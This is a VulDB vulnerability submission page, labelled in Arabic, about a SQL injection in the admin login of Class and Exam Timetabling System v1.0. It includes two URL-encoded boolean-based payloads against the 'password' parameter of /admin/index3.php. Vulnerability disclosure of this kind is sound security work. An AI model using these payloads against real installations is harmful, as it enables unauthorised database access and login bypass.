إرسال #94812: Class and Exam Timetabling System v1.0 /admin/index3.php post parameter 'password' exists sql injection vulnerabilityالمعلومات

عنوانClass and Exam Timetabling System v1.0 /admin/index3.php post parameter 'password' exists sql injection vulnerability
الوصفAn issue was discovered in Class and Exam Timetabling System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /admin/index3.php post parameter password. Payload1: username=ADMIN&password=a%27+OR+NOT+666%3D666%23&go=Log+In Payload2: username=ADMIN&password=a%27+OR+NOT+666%3D667%23&go=Log+In
المصدر⚠️ https://github.com/anquanclub/bug_report/blob/main/vendors/Cherylda%20Jardeliza%20Ohiman/Class%20and%20Exam%20Timetabling%20System/SQLi-1.md
المستخدم
 muhanyun (UID 41815)
ارسال26/02/2023 05:16 AM (3 سنوات منذ)
الاعتدال26/02/2023 12:53 PM (8 hours later)
الحالةتمت الموافقة
إدخال VulDB221797 [SourceCodester Class and Exam Timetabling System 1.0 POST Parameter /admin/index3.php كلمة المرور حقن SQL]
النقاط18

التالي نظرة عامة السابق

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!